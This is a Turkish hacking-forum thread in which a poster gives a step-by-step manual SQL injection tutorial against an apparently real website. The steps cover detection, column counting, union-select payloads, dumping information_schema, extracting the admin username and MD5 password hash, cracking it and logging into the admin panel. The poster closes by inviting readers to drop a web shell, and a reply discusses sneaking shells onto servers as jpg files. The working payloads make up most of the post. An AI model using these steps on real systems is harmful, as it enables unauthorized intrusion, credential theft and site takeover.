Warriors.to Underground Forum - Hack Forum - Leak Forum
  • Home
  • Forums
    New posts Search forums
  • Resources
    Latest reviews Search resources
  • Members
    Current visitors New profile posts Search profile posts
  • Awards
  • Chat 0
Log in Register
What's new Search

Search

By:
Advanced search…
Warriors.to Underground Forum - Hack Forum - Leak Forum
    • Home
    • Forums
    • Underground
    • Web Hacking/Security
  • Home
  • Forums
  • Underground
  • Web Hacking/Security
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an alternative browser.

Manuel Sql İnjection

  • Thread starter llslowll
  • Start date Dec 15, 2022
  • Tags
    admin şifre kırma hacked by llslowll hacker llslowll manuel sql sql açığı
L

llslowll

anamı siktiler
Member
Messages
105
Joined
Dec 10, 2022
Reaction score
67
Points
28
Awards
1
wCoin
0
  • Dec 15, 2022
  • #1

Manuel Sql İnjection​


Sql dediğimiz olay sql kodlamada yapılan hata sonucu ortaya çıkar
Sitede sql komutları çalıştırmamıza yarar
Çoğunlukla sql bulunulan sitelerde
php?id=
php?cat=
vb. Url'ler mevcuttur



Bir sitede sql açığının olup olmadığını url sonuna " ' " işareti bırakınca anlarız
Hata verirse sql var demektir.



​

Giriş​

Hedef Sitemiz Bu

amcjhww.jpg



Sitemiz bu url sonuna " ' " tek tırnak işareti bırakalım

6mrp2id.jpg


Sitede oluşan değişikliği sizde fark etmişsinizdir
Her seferinde hata çıkarmaz bazen sayfadan veriler eksilir biz o zamanda anlarız ki sql açığı var

​

Kolon Sayısı​

Şimdi ise kolon sayısını tespit edecez bunun için
Payload: +order+by+1-- -
Burdaki 1'i artıracaz sayfadan tekrar veriler silinene kadar veya hata çıkarana kadar

kn3b5zv.jpg


Evet bir bir artırdık ve 12 de hatayı aldık farz edelim


6ub3m8m.jpg

​

Ekrana Sayı Yazdırma​

Kolon sayısını öğrendik 11
Şimdiki payloadımız ise ekrana bir sayı yazıracak ve biz o sayı üzerinden sql komutları çalıştırabilecez
Ama bunu atlamayın url index.php?id=35 ise 35 in önüne - işaretini katmamız lazım bu aşamada
Payload: +union+select+1,2,3,4,5,6,7,8,9,10,11
Kolon sayısı ne kadar ise sizde ona göre sıralarsınız


b5kul7d.jpg


2 sayısını döndürdü şimdi bu 2 sayısı üzerinden komut çalışıracaz
örnek komutlar

version() -> Version Bilgisi
database() -> Database adını döner
@@plugin_dir -> Pluginlerin bulunduğu dizinleri döner

Payload: +union+select+1,@@plugin_dir,3,4,5,6,7,8,9,10,11

gr62iwj.jpg

​

Tablo İsimlerini Çekme​

Bu aşamada ise tablo isimlerini çekecez bizim için admin bilgisinin yer aldığı tablo gerekli
Payload1: group_concat(table_name)
Payload2: +from+information_schema.tables
payload1'i komut çalıştırdığımız yere
payload2'yi ise url'nin sonuna ekliyoruz

6viczws.jpg

​

Tablonun İçindeki Verileri Çekme(column)​

Admin tablosunu bulduk -> ak_admin
Tablonun İçeriğini Okuyalım
Payload1: group_concat(column_name)
Payload2: +from+information_schema.columns+where+table_name="ak_admin"

h1jk1zd.jpg


Evet username ve password çekelim bu aşamada
Payload1: group_concat(username,password)
Payload2:+from+ak_admin

hj6b03u.jpg


Evet Kullanıcı Adını Tespit Ettik -> admin
Parolası ise md5 ile şifrelenmiş onu kırmamız gerekecek
md5 decrypt sitelerinden birine girip çözelim

o1xdndi.jpg


Şifreyi de bulduk -> admin
Bakalım Panele Girebilecekmiyiz bu bilgiler ile

4gxqdy7.jpg


Panelede girdik gerisi shell basmaya kalmış kendinizi deneyip geliştirebilirsiniz
bu site üzerinden kolay gelsin herekese bir konun daha sonuna geldik.
​
 
  • Like
  • Love
Reactions: mur4d, arthur, LuXas and 2 others
Majesty

Majesty

Administrator
Administrator
Messages
164
Joined
Nov 25, 2022
Reaction score
431
Points
63
Awards
8
wCoin
5
  • Dec 15, 2022
  • #2
teşekkürler kardeşim emek vermişsin
 
t%C3%BCrk-bayra%C4%9F%C4%B1.gif
L

LuXas

localhost/TR
warrior
Messages
216
Joined
Dec 9, 2022
Reaction score
442
Points
63
Awards
3
wCoin
0
  • Dec 15, 2022
  • #3
Emeğine sağlık bro.
 
76a845354fc6e0cc01f4e01419c9b90a-png.74489

Emekli... 2014-2018
luxasdefacer.blogspot.com

xDcB3YN.png
​
L

llslowll

anamı siktiler
Member
Messages
105
Joined
Dec 10, 2022
Reaction score
67
Points
28
Awards
1
wCoin
0
  • Dec 15, 2022
  • #4
Majesty said:
Please, Log in or Register to view quote content!
Click to expand...
Eyv abi.
 
L

llslowll

anamı siktiler
Member
Messages
105
Joined
Dec 10, 2022
Reaction score
67
Points
28
Awards
1
wCoin
0
  • Dec 15, 2022
  • #5
LuXas said:
Please, Log in or Register to view quote content!
Click to expand...
Sağol dostum
 
X

xulusoy

Member
Messages
68
Joined
Dec 10, 2022
Reaction score
21
Points
8
wCoin
0
  • Dec 15, 2022
  • #6
llslowll said:
Please, Log in or Register to view quote content!
Click to expand...
emeğine sağlık
 
L

llslowll

anamı siktiler
Member
Messages
105
Joined
Dec 10, 2022
Reaction score
67
Points
28
Awards
1
wCoin
0
  • Dec 15, 2022
  • #7
xulusoy said:
Please, Log in or Register to view quote content!
Click to expand...
Teşekkürler.
 
A

arthur

Member
Messages
19
Joined
Dec 10, 2022
Reaction score
47
Points
13
wCoin
0
  • Dec 15, 2022
  • #8
eskiden bu gibi sitelerde jpg olarak shell okutuluyordu acaba hala yiyor mu
 
L

llslowll

anamı siktiler
Member
Messages
105
Joined
Dec 10, 2022
Reaction score
67
Points
28
Awards
1
wCoin
0
  • Dec 15, 2022
  • #9
arthur said:
Please, Log in or Register to view quote content!
Click to expand...
Nadired olsa bazı serverlere jpg sokuyorum bir ara içerik konu açarım.
 
You must log in or register to reply here.
Share:
Facebook X (Twitter) Reddit Pinterest Tumblr WhatsApp Email Share Link
  • Home
  • Forums
  • Underground
  • Web Hacking/Security


About Warriors.to

It is a real Turkish hacking forum. It was established in 2022 and its aim is to respond to the attacks against Turkey and gather Turkish hackers under one roof.
Gerçek Türk Hack Forumudur. 2022 yılında kurulmuş olup amacı Türkiye'ye yönelik saldırılara karşılık vermek ve Türk hackerları tek çatı altında toplamaktır.

Forum Navigation

  •   Yönetici Listesi
  •   Üye Listesi
  •   Arama Yap

Yardım

  •   Forum Dökümanları

Hesap

  •   Kontrol Panel
  • English (US)
  • Contact us
  • Help
  • Home
  • RSS
Theme Made by W4H9LT 
Advanced Forum Stats, Awards System by AddonFlare - Premium XF2 Addons
Some of the add-ons on this site are powered by XenConcept™ ©2017-2025 XenConcept Ltd. (Details)
| Xenforo Add-ons © by ©XenTR
Top Bottom